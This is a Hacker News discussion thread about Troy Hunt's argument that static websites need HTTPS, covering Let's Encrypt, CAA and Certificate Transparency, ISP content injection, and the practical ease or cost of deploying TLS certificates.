Hacker News new | past | comments | ask | show | jobs | submit login
Why Static Websites Need HTTPS (troyhunt.com)
328 points by edward on Aug 28, 2018 | hide | past | favorite | 253 comments



Let's Encrypt is one of the best things that happened to the web recently. I wish we had more choices though. Relying so much on a single party is unnerving.


It is good, but it is annoying that it came out before we were able to properly lock down domains to cert authorities via DNS. It used to be that a malactor had to buy a new cert when they owned part of your backend if they weren't able to get your private keys.

Now they can just use Let's Encrypt.


IIRC Let's Encrypt are more strict in their validation (HTTP, DNS and SNI) than the least onerous authorities before them. The difference is that they are automated and free, but I don't think that I can get any cert I couldn't get before (either for payment or free).


No you are not correct and I've been downloaded by people that don't know the history of DNS Certification Authority Authorization (CAA), which became required in 2017.

Let's Encrypt launched 2016, which meant that unless you were doing HPKP with long pin times and had traffic that already had hit your endpoint, if someone was on your gear (but lacked your private key) they could impersonate you for free and with no messing around with stolen credit cards to CAs.

To verify for Let's Encrypt—contrary to what you recall—all you are required to prove is that you can set a specific value at a path for the domain you are responsible for.

DNS verification is an option; but few use it.

Let's Encrypt has meaningfully reduced the barrier for certificate forgery. Every startup should set CAA headers now, but few do. It's still good that Let's Encrypt exist but it has its drawbacks.


This is really a drawback of the browser though, right? Let's Encrypt is about making traffic https not giving you strong verification of the other party. It's right there in the name!

The browsers do show some things for better verified certificates e.g. "YOUR BANK LTD." on a banks cert, "Secure" on hacker news/My page secured with let's encrypt.

So controlling traffic on the domain is really sufficient for the promise that LE is trying to make to you which is "When I accessed this domain, the entity that owns this key controlled the traffic. I don't really know anything about the entity."

If you think that presents a vulnerability then it's because you're equating https with entity verification (and I don't blame you because the browsers have trained us to do this)


Unfortunately the "YOUR BANK LTD" certs have a major drawback: No obscure / arbitrary subdomains. It's why Google doesn't use them.

And I agree with your conclusion HTTPS is better than HTTP, but it doesn't mean we're talking with whom we think.


> Unfortunately the "YOUR BANK LTD" certs have a major drawback: No obscure / arbitrary subdomains.

Why is that a drawback from a user POV? I wish sites would try hard to keep there stuff in one part of the DNS name-tree if only to make uMatrix easier to use. I'm glad of anything that encourages them to do so.


Is your argument honestly that paying less than $10 is a sufficient deterrent for a serious attacker? To take advantage of a mis-issued certificate to begin with requires more resources than that.

It's disingenuous to call this certificate forgery. If your gear is owned or somebody is in a position to perform active MITM on you, then WebPKI doesn't give a damn about your situation to begin with. It's not part of the security model they're concerned with. DV does exactly what it says on the label, and Let's Encrypt did nothing to change that.


The reality is that it isn't the $10 or the wildcard $120; it's the credit card that matters. When Let's Encrypt works in a scriptable context it means that something that used to be manual and a judgement call is now something that is routine.

I know this seems like splitting hairs, but it's actually mattered to some of my clients. Try to reverse the chessboard. This is exactly how things slip in and this is really being used in the wild.


Forgive me for further splitting hairs, but you can buy SSL certificates without a credit card or proof of identity (Namecheap + Bitcoin since 2013 being one but not the only opportunity).

I think this $ thing is an arbitrary line in the sand based on an imperfect picture of how things used to be, and how things used to be did not protect domain owners. Getting certificates mis-issued used to be waaaay easier than it is now (even without demonstrable control of the domain/website). There were a tonne of insecure methods provided for in the BRs and there was no visibility into it until CT came along.


I don't think this changed what you think it changed

Historically a Certificate Authority did whatever it pleased to validate control over the name. It is _definitely_ true that an adversary who "was on your gear" could get a certificate.

Once the CA/B Forum comes into existence (which is when those green bar "EV" certificates appear) there are rules for how to do this validation, but, crucially, those rules have a clause which says "Any other method". Yup, CAs were still free to do whatever they wanted.

By 2010 or so they could get a "free trial" certificate, which would be annoying for a real site owner but crooks don't care about that, the "free trial" period is long enough to get the job done, and if the site's actual owners get billed for exceeding their "free trial" well boo hoo.

In 2016 the CA/B voted on new rules for validation which got rid of "Any other method" but although the vote passed, it was tied up in lawyer hell because it turns out commercial CAs owned patents on lots of crappy methods.

In summer 2017 Mozilla got tired of the foot-dragging caused by lawyers and simply changed _their_ trust rules, which in effect unilaterally changes the rules for a public CA since "Our certificates don't work in Firefox" might as well say "We don't want to be in business any more, bye".

These new rules are the Ten Blessed Methods (but now only eight or nine are in use) but crucially Let's Encrypt, unlike a lot of commercial CAs, had been compliant from its creation, indeed its staff helped write them.

Your rosy view is totally wrong, here are two REAL examples of things actual publicly trusted CAs were doing prior to the Ten Blessed Methods which weren't even _prohibited_ even though they're worthless:

1. Send an email to administrator@example.com with a link in it. If the link is resolved, this validates that the legitimate owner of example.com wanted a certificate issued for any name under example.com

What if an "anti-virus" gateway dereferences the link to check if it's a viral payload before trying to even deliver the email?

"Hi, An Actual Criminal wants a certificate issued for login.yourbank.example. As the Administrator please click this link to authorise this certificate."

[ AV software dereferences link. Cert issued to An Actual Criminal. The system works... ]

"I'm sorry, administrator@yourbank.example doesn't exist"

[ Oh right, nobody at yourbank.example actually even saw the verification message. Well I'm sure it's fine ]

2. Tell the applicant to specify a URL where they can see a special one-time code, once the applicant confirms that's done check the one-time code is seen at that URL

What if the attacker suggests a URL that is just the one-time code, URL escaped, and the result is a 404 error reciting the code because that's just how your server's 404 errors work?

Nobody would accept a 404 error as proof? Right? Wrong. Well, OK, but once they fixed that it's fine, right? Wrong, lots of commercial HTTP servers don't send 404, they send a redirect and paste your message into the redirect, thus passing the test.

Let's Encrypt's design actually does a pretty good job here, if you feel this isn't enough then the reality is that before the Ten Blessed Methods many other trusted CAs were _worse_


Can you clarify what restrictions you'd like to see in place? I didn't quite follow this, but if you can describe what you want to see, I might be able to describe a way to do it or request that it be created.


It's fine now, following CAA records is now mandatory, but prior to 2017 we didn't and even now most websites don't use it. CAA should be mandatory in a Let's Encrypted world because it's now trivial to create a HTTPS cert. It no longer requires stolen credit card details.


Thanks. I'm also hoping that some day there will be a direct domain-registrar-to-CA authentication protocol of some sort!


More from the authoritative DNS servers than the registrar but with DNSSEC enabled, DANE[0] is a pretty good system.

Google deemed the failure rate of ~2% too high but I hold out hope that banks and other high value targets will use DANE in tandem with the traditional HTTPs CAs and use something like HSTS except instead of requiring HTTPS for a particular domain, will require DANE. Maybe something like viewing your account will accpet a CA signed cert, but an actual money transfer goes through a subdomain that required DANE.

[0] https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Na...


Sure, I was thinking about authentication for certificate issuance purposes (where Let's Encrypt already enforces DNSSEC validation for all issuance-related DNS lookups where DNSSEC is present on a zone—in fact, invalid DNSSEC signatures aren't an uncommon reason for issuance problems).

But DANE enforced by clients would also be quite valuable for preventing problems due to CA misissuance, or for the problem recently highlighted by security researchers that someone might deliberately allow a domain to expire while still possessing long-lived certificates for names under that domain.


StartSSL already existed.


Do we have conclusive evidence yet that LE is not a honey pot? I mean, if I were the NSA...


It's a valid question, with two possible threat models:

1) the honeypot uses your private keys to MITM connections

Let's Encrypt doesn't handle your private keys. You generate them yourself, and submit a CRL to LE to get a cert issued. They have no knowledge of your private key.

2) the honeypot issues fake certs

Let's Encrypt submits a log of every cert issued, see https://crt.sh/ . To verify, it'd be pretty trivial to create a browser extension (if one doesn't exist already) that checks whether certs you encounter appear in the certificate log.


For CT the finished system involves browsers checking that the server can prove its certificates were logged (the ones you get from Let's Encrypt have such proof embedded) and periodically talking to Log Monitors (e.g. owned by your browser vendor) about proofs it has seen.

If somebody has seen a proof that is contradicted by the published log state this means the Logs involved are corrupt. If an otherwise authentic cert is shown without proofs or those proofs are bogus the cert may have been unlogged for nefarious reasons, it shouldn't be accepted and needs reporting

Chrome has the start of this, it checks for the proofs. Firefox is getting roughly the same feature "soon". But the finished system with all bells and whistles is probably a year or five away.

Good news is that even unfinished CT has been very effective.


What would you do with this power? Let's Encrypt certificates are public and don't involve any knowledge of subscribers' private keys.


You don't need to have private keys to exploit this scenario. Let's say you own example.com, and you add a certificate by Let's Encrypt. If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

The value of a CA is that it's a trusted 3rd party that holds a private key used to sign public keys (certificates). Never a CA should get hold of your private keys.


> If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

I'm not sure if you're referring to CAs' ability to issue fake certificates, or if you're suggesting that the certificate issuer can directly MITM connections.

CAs' ability to issue fake certificates is a very serious concern which has led to the Certificate Transparency system where all issued certificates must be publicly disclosed (in a system outside of the issuer's control) in order to be publicly trusted. A site doesn't have to use a certificate from a particular CA in order to be vulnerable to misissuance by that CA, as in the Iranian Comodo and DigiNotar attacks, where Gmail was briefly vulnerable to MITM attacked involving misissued certificates from these CAs even though it didn't normally use certificates from either of them at all.

CAs don't have the ability to use their signing keys directly to MITM connections involving certificates that they issued, because the signing key isn't used for any cryptographic purpose other than validating that the certificate (which refers to the site's public key) was validly issued.


Of course, you're right. My phrasing was not the best. The rogue CA would need to perform a classical MiTM as all the other mortals do, having access to the signing keys does not give you special MiTM powers, other than when you actually are able to conduct a MiTM through other means, you'll have valid certs to intercept the connection.

Totally agree with your point about trust being a very hard problem to solve, that's why CAs first came in to place, and now we have CT (which is not widely adopted yet). It is a problem that has no clear and definite solution yet.

Edit: Also, CT is no magical solution. It's just another "node" in the graph of trust we're establishing. As many other things have in the past, the CT system itself could also fail.


Chrome requires certs to be published in CT to trust it[0], since chrome 68[1]. Because of this, I would believe CT is widely adopted.

[0]: http://www.certificate-transparency.org/certificate-transpar... , Certificate Inclusion Check

[1]: https://groups.google.com/a/chromium.org/forum/#!msg/ct-poli...


> The rogue CA would need to perform a classical MiTM as all the other mortals do, having access to the signing keys does not give you special MiTM powers, other than when you actually are able to conduct a MiTM through other means, you'll have valid certs to intercept the connection.

But this thread is operating under the thought experiment that the NSA already owns LetsEncrypt. And in reality-- at least according to the Snowden leaks-- NSA currently has classical MiTM capabilities. (Can't remember which program it was that was using some node between the user and the desired server to send back a forged response that would almost always beat the server to the punch.)

So in this thought experiment there are only two pieces of Triforce and NSA has them both.


> (Can't remember which program it was that was using some node between the user and the desired server to send back a forged response that would almost always beat the server to the punch.)

These were called QUANTUM (with various sub-projects related to specific applications of that capability).


The point is that the NSA doesn't need to own Let's Encrypt to do that; they could use literally _any_ certificate authority.

Also there _is_ a third piece of the triforce; certificate transparency logs; and those would be very difficult to compromise without the certificate transparency monitors noticing.


> If Let's Encrypt is a malicious actor, they could MiTM a connection to your site, and present a VALID certificate to the target user, as they hold the private keys used to sign the public certificate.

And if they were able to turn off certificate transparency logs or targeted users only without it (or a hacked browser or whatever) to keep site owners from knowing about invalid certs being given.


If it's an NSA honeypot it will still be a positive thing for 99% of use cases.

Also, why would they do this? It's smarter to compromise the existing CAs.


What use would it be? You don't send LE the private key, and if the NSA was just going to forge TLS certs, they wouldn't need LE to do it.


Any CA could be a honeypot. I would say LE is less likely because so much of what they do is in the open.


HTTPS security model is fundamentally broken to meet the needs of the junta. National Security Letters can be used to "legally" obtain root certificate keys of all Root CAs even remotely affiliated with the United States. You must be extremely naive to believe that the NSA has not already collected all Root CA keys relevant to operations within USA borders. NSL also tend to forbid disclosure of the existence of the NSL, so you will never know that the Root CA is compromised. If you as a Root CA disclose the existence of such a NSL, MS-13 might pay you a visit, and you might unfortunately show up on a obituary in a newspaper nobody reads.


If this were something the NSA were actually doing, wouldn't we have noticed it by now via the rogue certificates showing up in certificate transparency logs?


When I read things like that, I always think of the paper "The Rational Rejection of Security Advice by Users". [1]

Yes, content injection is bad, but the chance of it happening multiplied by the damage it could cause to your users is probably less than the the effort required to shift a static blog site to HTTPS. (Do not underestimate the leap in difficulty from copy-pasting from an Nginx tutorial to understanding how Let's Encrypt works).

[1] https://www.nspw.org/2009/proceedings/2009/nspw2009-herley.p...


As a website visitor, if I don't see HTTPS, I worry -- ever so slightly -- that someone has added some junk to the content along the way, whether it's my ISP or someone with a fake AP in a coffee shop.

I also just don't want ISPs etc. knowing what content I read, in minute detail. No, I don't "have something to hide", but I'm sick of it being so easy for companies to build detailed profiles of my habits and then sell that information to people who want to sell me things. No thanks.

Sure, I could run a VPN all the time. But I think to be a good web citizen, site operators should do all they can to protect their users from malicious actors out there. TLS is just one piece of that.

And honestly, for a modest static blog site, you can set up Let's Encrypt in less than an hour.


The worry is well-founded too, as e.g. tons of hotels I've visited have added junk, even recently, as have some coffee shops (mostly prior to widespread wifi-ification though, I haven't seen it in a while). Airplane / airport wifi has as well.

HTTP feeds this kind of hostile behavior.


No need to worry. That static site is probably loading dozens of javascript libraries and mining every click on the page anyway... err, analytics.


https://www.usenix.org/system/files/conference/usenixsecurit...

A big part of the problem here is that vendors do a _lousy_ job of making this easy. An out-of-box Apache is a fairly good HTTP server, but it'll take you an hour with a good tutorial to make it a half-way decent HTTPS server. Not because HTTPS is inherently difficult but because no relevant expertise was brought to bear in Apache's implementation.

And this isn't just a Unix flavour problem, the IIS handling of TLS is garbage too. Microsoft has documentation that's incomplete or flat wrong, and then you're expected to muddle along following blog posts and video tutorials.

There's a LOT of cargo culting in this space. Almost every instance of the name "Middlesex" you see in an X.509 certificate is a result of this sort of cargo culting, because the postal county of Middlesex ceased to exist before X.509 was even created, but it looks superficially as though you need to specify a "county" in X.509 and so people based in London dredged up Middlesex. And it didn't _break_ anything so they kept doing it without knowing why.


FWIW, Apache is getting native support for ACME certs: https://letsencrypt.org/2017/10/17/acme-support-in-apache-ht...

Hopefully in the future more web servers will implement this, and HTTPS will be enabled as the default configuration.


That was one of my favorite Mozilla Open Source Support projects!


My house is insecure. There's no alarm, so anyone could just smash a window and steal my TV. But replacing my TV costs a lot less than an alarm system, and the risk of being caught for theft is greater than the TV's value.

My landlord sent a handyman in while I was on vacation once, and the handyman didn't close the front door all the way (or try to lock it). My door was open for 3 days, visible from the street, and I don't live in the nice side of town. No one stole the TV, but my electric bill was high that month.

A MITM attack on a static site is definitely possible, maybe even easy, but I'm not going to worry about it unless I have something important to protect.


> A MITM attack on a static site is definitely possible, maybe even easy, but I'm not going to worry about it unless I have something important to protect.

HTTPS doesn't protect the content of your site from being stolen, it protects your users from hostile third-party content masquerading as yours.


>it protects your users from hostile third-party content masquerading as yours

Exactly. What does anyone lose if my anonymous untrusted blog does something untrustworthy for that one reader who has an infected router?

Should I encrypt messages I write on post cards, because I'm afraid a disgruntled postal worker will write "you suck" on the bottom? The worst case scenario here is temporary vandalism.


The same argument applies to littering. It's only going to harm strangers, and you're unlikely to get caught, so strictly from a cost-benefit perspective it seems like a good idea. But if everyone makes that "rational" decision then we all lose.


The problem is that as a community we want to move to where no traffic is unencrypted so the MITM don't have to be trusted. If your static site wants an exception then your static site is going to be where I get hit.


No, the worst case scenario is that the user gets compromised/infected and becomes part of a botnet that attacks the rest of us.


> HTTPS doesn't protect the content of your site from being stolen, it protects your users from hostile third-party content masquerading as yours.

Hostile third party content is only hostile because the client used to access the content does not take client security seriously.

Food for thought: As an end user consumer visiting random, benign websites, I want my browser to be protecting me against hostiles, rather than relying on website operators to do that for me. Just like I run antivirus on my machines instead of relying on everyone else to run it.


Just make it so that your browser doesn't render any http delivered content. Problem solved. From a client point of view that's the only protection you can do. A MITM over http is undetectable for you. With current OSes and hardware there is no sandboxing which will protect you under all circumstances.

If you do this, site providers are forced to switch to https anyway.


> If you do this, site providers are forced to switch to https anyway.

No, if everyone does this, providers are forced to switch. If you do it, it just means you're cut off from some portion of the web.


I guess one problem with risks on the web when compared to your house analogy is that automation can make all the difference there. For the specific MITM example automation might be less likely, but on computer networks, even very unlikely risks can get amplified by the fact that someone can just automate the exploitation.

If automated drones roamed the country looking for open doors to break into, people might be more worried about their home security. Fortunately, the physical world protects us from wide-scale exploitation.


High bill because someone walked in and watched TV for three days? (I'm guessing it was actually due to heating/aircon)


You know what's even easier than a simple Nginx server setup? A simple https://caddyserver.com server setup. Which will automatically provision a LetsEncrypt cert for you, no configuration required.

Or, let's go even simpler: no server of your own at all. Anyone who uses GitHub Pages for their static site, gets an automatic LetsEncrypt cert provisioned for their custom domain if they set one. (I'm honestly surprised that other SaaS hosts that set you up with some service on a subdomain, and allow you to map it to a custom domain, haven't followed along and done the same. It's an easy feature to offer!)

Deploying Nginx is a uniquely-bad example to use right now for TLS ease-of-use. There are all sorts of setups where TLS "just happens"—some of which web-development novices will likely encounter before they become experienced enough to consider "deploying their own web server" to be a sensible action.


Thank you for sharing Caddy -- haven't heard of this until your comment. Cheers!


This is important. Because the discussion around HTTPS tends to train users into think that HTTPS = Web Security.

I totally agree that it's important, and I understand the attack vectors. But what about your outdated WordPress/Joomla installation? What about your default password on your admin site? Those I think are more serious issues, but of course harder to tackle.

To exploit a MiTM you need to be on the same network, this could be achieved through your local-cafe's WiFi or by compromising an internal system of a local network. Not a trivial task I would say. If you manage to pull it off, the impact is contained to that local network.

If you compromise the insecure site directly, you can have an much wider audience and HTTPS won't help you in this scenario.


> To exploit a MiTM you need to be on the same network, this could be achieved through your local-cafe's WiFi or by compromising an internal system of a local network.

Or, say, your ISP injecting ads and tracking scripts into unencrypted pages your browser requests.


Holy, I forgot about that one! You're totally right and I'm surprised it's not one of the main arguments for this push for HTTPS.


IMO it's really the only compelling argument for HTTPS on sites that don't deal with traffic worth intercepting. Other than that, I agree with you re café Wi-fi, etc: the man-in-the-middle risk is so small and localized that it may as well not exist.


Not only is the coffee shop using an ISP that is likely MITMing you, insecure coffee wifi routers can be exploited at scale to MITM a lot of coffee shops at once.


I think thats why google has been pushing so hard for https, isps were able to do tracking just as well under http, so google wants to shut that door.


The other side I would pose is: do you want anyone to alter your responses? I'm currently trying to find the RFC, but I recall an ISP defining an RFC for tampering with HTTP responses in-transit. In addition, I also recall seeing Comcast (I believe) injecting JS to users that they are approaching their plan limits.

Obviously, not the end of the world. But do you want any third party to easily alter the response from your server to the client(s)?


I believe you're think RFC 6018: https://tools.ietf.org/html/rfc6108

Related HN discussion: https://news.ycombinator.com/item?id=15890551


> In addition, I also recall seeing Comcast (I believe) injecting JS to users that they are approaching their plan limits

This has happened to me. Re-installed Windows on my gaming computer and re-downloaded all my games. By the time I hit 900GB usage, any HTTP page would display a popup with "You have 100GB of data left".

I thought it was malware on the website trying to phish me the first time I saw it.


Exactly this. If you can't imagine the harm in that - pretend they are injecting NAMBLA ads or Goatse-type images into your blog.


I've also seen airlines do this with their in-flight wifi. Looking at you, Icelandair.


It's not just about the chance of problems, it's also the fact that browsers are making it very obvious when a site doesn't have https, and this is enough to scare users away.


You don't need to "understand how Let's Encrypt works" to use it. You can still copy & paste from a tutorial in order to set it up.


Cpanel comes with easy to use Lets Encrypt module. Auto-new the certificate and sends optional email alerts each time it renews or fails.

Web hosts are making it easy to use Lets Encrypt, which surprised me. I thought they'd be reluctant to give up the revenue from high margin certificate sales.


This varies a lot from web host to web host.


Not GoDaddy


I've had a quick look at the paper you reference, but my immediate question is ... this was written around 2009. If the costs and likelihood of getting hacked or phished have increased significantly, some of the conclusions of the paper may now be misleading, at least in detail. Has anyone done an update in the last year?

I still like the paper for one good reason ... it challenges IT people to ask the question: what risk am I mitigating with this rule on the users, and is it worth everyone's effort that will go into it? If yes, see if you can impose the rule. If no ... just be sure you didn't get the numbers wrong.


wait, what? if you can get nginx running you can get lets encrypt running


Pretty sure you can use certbot and just run like... a few commands. Even easier than setting up Nginx.


Certbot has a issue with dependencies that I’d rather not deal with on a production server:

https://github.com/certbot/certbot/issues/1301

Not to worry though, there are over 100 other ACME clients that I can choose from.


It's true that certbox is very easy to install and single run on stable machines with full command line access. Then a lot of Paas providers pre-package a let's encrypt feature to allow for simple setup of SSL cert (as simple as checking a checkbox most of the time)

Now certbox in itself is not really simple in my opinion, and one feels it very fast as soon as we fall out of the beaten path. For instance having it run for volatile instances isn't simple, or if the Paas misses the single feature you need (ex: wildcard support on heroku) you'll have to bear all the complexity again on your shoulders.

In particular the base principle is to renew the cert every 30 days, so inherently proper automation and error handling is the first barrier to entry for certbot. That's already a bit further than "a few commands" in my opinion.


The point isn't that it is particularly difficult (if you know what you are doing). The point is that from a cost-benefit perspective, it probably isn't worth more than 2 minutes of your time, if that.


Given that Chrome now throws a "not secure" message against your URL when it's HTTP makes it more than worth two minutes, IMO.


There's always things like CloudFlare? You have to use them as the main NS, but both transfering the domain and enabling HTTPS is a few clicks (properly configuring your server to only be accessible by CF might be harder, but may not be needed in a static site case).


Two stories.

Firstly, I had a fair amount of websites with a now EIG owned company for about 10 years. It was just a shared host, but they're all low traffic, and I could easily add a domain name and spin up a blog/project. A few years back I needed https for an API I was working with - the cost was something like $40 a year for the domain, for a project that wasn't a money spinner. So I found another (read: free) way to access the API.

Earlier this year I asked again. It was something like $20-$100 per domain to put an https cert in place, even if I got it myself from LetsEncrypt. As the entire package was about about $100 a year (up 30%, with worse customer service since EIG took over) I finally took the step and moved all my sites elsewhere. The new host isn't much more expensive, but provides free LetsEncrypt with a click from the controlpanel. I now use https on most things.

Secondly, I have a few sites with a decent number of FB likes that have counted up as the result of some viral/social campaigns in the past. None have forms on, all are links to elsewhere. Currently those likes work as (not insignificant) social proofing. Move the site from http to https and I lose the count on the Like button.

The cost in the first point (or the effort/time/cost in moving everything) just hadn't been worth it for the smaller stuff. Facebook not sorting the counts hasn't made it worth it in the second. I suspect my reasons are 2 of many that stop people from upgrading - I guess I'm just saying that even with the best intentions, there are other factors at play that prevent John Everyman from making the move. Make it easy/default for him, more https everywhere.


You can set up your apache/nginx or whatever webserver to redirect http requests to https. That way you can still link to your website with an http:// URL.


Appreciated, but this is a hacky solution. If you use the graph explorer, both the http and https addresses have different counts. It's very frustrating - shouldn't be that way.


Add your site to the HSTS Preload List, then it'll be very unlikely to have any HTTP hits.


Didn't realise that existed. Very useful thanks!

But again, it's not exactly up there for John Everyman - and it doesn't sort Facebook having different share counts for the https and http domain.


True. And you have to be extra careful with HSTS Preloading; if one of your subdomains breaks because of HTTPS, it'll be a pain to get your domain taken off the list.


> Currently those likes work as (not insignificant) social proofing. Move the site from http to https and I lose the count on the Like button

Surely there must be a alternative way of doing this?


And one reason it doesn't: https://meyerweb.com/eric/thoughts/2018/08/07/securing-sites...

Secure websites make the web less accessible for those who rely on metered satellite internet (and I'm sure plenty of other cases).

Know who your demographic is and make sure you don't make things more difficult for them. Maybe provide an option for users to access your static site on a separate insecure domain, clearly labeled as such.


Nope.

Thats fixable in the client using a http proxy.

The whole point of https is to roll back the ability for middleware devices to modify traffic without the authority of the client or the server.

This is a good thing. He shouldn't be setting up a situation where he is intercepting traffic that neither party of the connection had authorized him to intercept. Regardless of how righteous his intentions are.


> Secure makes less accessible for those with shitty connections

This demographic seems especially vulnerable to untrusted 3rd party networks that promise speed or unlimited traffic. People able to make an actually informed decision about security trade-offs are probably a more difficult and could probably work around negative trade-offs by themselves, as mentioned by others. So unless you target especially them, you should probably go with the safer default.


There's nothing wrong with making something "more difficult" if it serves the greater good or has a larger positive impact than negative. For one, using a trivially higher percentage of a metered satellite feed is not "more difficult," just perhaps marginally more expensive. What percentage of folks reading static blogs are on a metered satellite connection?

I think if every site and application that is currently HTTP was HTTPS a year from now it would be a net positive for internet users.


Having very high packet loss means something is badly wrong. A good wire-level (yes I know, there are no wires, nevertheless) protocol aims to hit lower packet loss rates by fiddling with other parameters. Example: Let's say you have 40MHz of assigned frequencies, but when both ends measure they find 4MHz of that is full of noisy crap, the rest is fairly quiet. Well, rather than lose bits in those 4MHz and toss away many packets, why not keep 36MHz with a much lower error? If only 6000 packets per second get through of 10 000 sent, then an option to send 9000 and receive 8000 of them is already a win.

Now, upgrading satellites is trickier and more expensive than upgrading your home cable box, at the extreme obviously sending a bloke up to "swap out this board for a newer one" is either tremendously difficult or outright impossible depending on the orbital characteristics. But we shouldn't act as though high packet loss rates at the IP layer are to be expected, they are avoidable. And fixing them will do a lot more than just enable HTTPS to work better.


>But we shouldn't act as though high packet loss rates at the IP layer are to be expected, they are avoidable. And fixing them will do a lot more than just enable HTTPS to work better.

At that distance the very physical latency limit is almost a second. You can literally not go below. The high latency will have a lot of protocols simply time out or consider the packet lost.

At that distance you need some well engineered ground equipment to handle the signal losses. A dish and a high powered transmitter that need to be within a degree of the target. If you're off by a degree you're likely going to hit very bad packet loss. A degree is not much and you could be cause by the ground below stretching and twisting over the day due to temperature changes. TV doesn't have to deal with sending data up the link other than using the massively more powerful and expensive dishes from TV networks.

Lastly, from ground to geostationary orbit you may find that your 40MHz band is full of crap. Not because someone else is sending but because you're sending through a solid belt of radiation and magnetic flux. You'll find that for a wide range of bands they either suck at penetrating the atmosphere, penetrating the magnetic field or get sucked up by interference from half the universe.

The layers above IP have ways to handle packet loss for a reason (although the reason was bad copper cables and bad MAC). Also, the MAC is another problem; you're not the only one who wants to use the very limited resources of the sat. One of the most common and effective forms of bandwidth limiting is dropping packets and it's normal. Packets drop all the time, every TCP connection drops packets. It happens and almost all protocols deal with it on one level or another.


Couldn’t you set up the local cache as a proxy server instead of a MitM to solve this? Though it’s a less transparent solution (you have to set up the proxy and its CA on every client).


That article specifically mentions that service workers avoid these issues. There's nothing stopping static pages from making service workers available.

HTTPS and a service worker are a far better solution than having an insecure domain.


Yeah that's pretty much not the case once you setup a HTTPS proxy with a cache. HTTPS merely requires this to be an opt-in from the client unlike HTTP where you can just do it, to hell with the client.

Don't spread BS.


If browsers supported a method to provide content securely without the need to encrypt everything, lots of uses of the web would not be hampered by the TLS-everything-that-moves movement. The limitations we have accepted in our browsers are what causes these conflicts. But we don't have to accept them. We could do with less propaganda and more compromise and innovation.


I'm unsure on how you could do what you've said without encryption. Any ideas?


Debian apt repos work this way. Everything has hashes or PGP signatures.

It doesn't have to be encrypted to be trusted. In fact, anyone can set up a separate mirror and clients can use it with no concern about safety.

It doesn't offer confidentiality, but it does offer integrity.


You could securely sign the data in a tamper resistant way. Although that would be at least as disruptive to http as https is. And it also can't obscure the specific pages you're visiting.


Cryptographic verification?


Sure, but that would still leave the data open to the world. Not an alternative to TLS.


Most of the content on the web is intentionally open to the world.


But our personal data is not. So much data is potentially made available from an unencrypted HTTP request.


Nobody is saying that personal data should be unencrypted.


the post is good.. but also: confidentiality matters.

Think about a library. There are no secrets in the stacks that need to be kept from public disclosure. What is secret is the act of using the library - i.e. what they choose to read.


A big reason is that Chrome (and others?) specifically show 'Not Secure' for all sites not using https.


This is a massive reason, imo. The average user views that url annotation as a bad thing. They don't know it's static, or even what "static" refers to.


Even if they knew the site was static, "not secure" would still be valid. An ISP or malicious wifi network may be recording their browsing history, downsampling images, injecting or replacing ads, replacing executables with backdoored versions, adding fake login forms or popups to get the user to give a password of theirs, etc.


Actually one service that DNS providers should offer is generating and renewing let's encrypt wildcard certificates automatically, and offering their clients to download them through some API. That would make life a lot easier for less technical devs who are intimidated by the complexity of pki.


Github pages supports TLS even for custom domains now, via Let's Encrypt. At this point, I don't think there's any excuse anymore for having a static website without TLS. Either use Github pages, or just use your favorite hosting provider and put a CDN in front of it.

Note: I'm not affiliated to Github, but I've used them multiple times, and just recently discovered they now support TLS. If you want to see an example: https://solokeys.com is hosted on Github pages.


As far as I know Github is the _only_ static site provider that will do this for you.

I’m scratching my head trying to figure out the best way to do automated certificate renewal for othe providers. It’s not like you can run certbot on a static page.


> As far as I know Github is the _only_ static site provider that will do this for you.

Netlify automatically does this [1], and Zeit's Now too, I think [2].

[1] https://www.netlify.com/docs/ssl/

[2] https://zeit.co/docs/examples/static


What if your website is only accessible for you from within your LAN? Such as your router, LAN, or your settopbox? If you have DHCP as well and don't control the DNS or don't have root (such as on IoT devices) then you cannot use Lets Encrypt. Or am I missing something?


I used to have a $75 netgear router at my house. I changed the local DHCP settings to give out a raspberry pi's internal as DNS. I run dnsmasq on the pi and resolve local hosts that way. Ever internal service in my house uses HTTPS and I have about a dozen.


Sorry this is a day late, but how do you get certificates for internal services? Do you manually trust them on each client? Or do you have a wildcard cert from a public server? Is there some cleaner way to manage internal HTTPS?


I resolve internal services as subdomains of a domain I own. I use a wildcard I get assigned on an EC2. I script an sftp upload of the a new cert every renewal to my main internal machine where it is shared via nfs. This is the simplest way I've found.


I feel like this article has been posted a dozen times already, but the "past" link is showing this as the only submission.

EDIT: Nevermind, I'm confusing it with similar discussions:

https://news.ycombinator.com/item?id=17651652

https://news.ycombinator.com/item?id=17599022

https://news.ycombinator.com/item?id=17605973


There is one static webpage that I won't put HTTPS on; the dashboard of my pi.hole.

Though it's more of an architectural decision as it enables the DNS server to blackhole HTTPS more effectively (since it just gets a CONNREFUSED back).

Really, it's an exception to the rule and only because I can't ask my guests to install my pihole CA on their devices (many of which don't support that stuff anyway).

Well and there is that other website but the prime directive forbids that I mention it...


You can buy a domain name and do DNS auth. Requires no open ports and you'll get a trusted cert for that one Pi. I did it for mine (but with SNI verification).


Pi.hole, it's only local and there is a reason it doesn't open port 443 and only works on 80. On a local non-wireless LAN this is not a concern in my threatmodel.


The drawback to use https everywhere is that a big company can't cache locally things that gets downloaded again and again from the network like OS and application updates, videos on the web, and so on

I think that we need an alternative to https, a protocol that guarantees only authentication (sing the packets, basically) and doesn:t encrypt content, you can verify that what you get is what the website owner intended (no mitm) and you can have a cache.


I went there to see why and the only subhead I understood without searching was "HTTPS is easy". I gather, only HTTPS is easy nowadays :)


Not security related, but for SEO having HTTPS will treat your website with more mercy in the storm of google searches


How can I go about securing a server without a domain? Just a static IP? Let's Encrypt doesn't allow IPs and the owner doesn't care for a domain.

Context: small business with a web based application in a local server, all they need is to be able to access reports from their phone.


Self-signed certificate (or own CA and certificate signed by that). Buying a certificate for an IP is more expensive than a domain.


I've tried self-signed certificate somewhere else but it seems Chrome doesn't add the certificate permanently so every few days they get the "scary" not secure window again.

I'll try with my own CA.


Can I suggest registering a domain for $1, pointing that at the IP and using LetsEncrypt? Probably less effort in the long run.


Trusted certification authorities are not issuing DV SSL certificates (with domain verification) for IP-addresses; because it creates certain security threats .


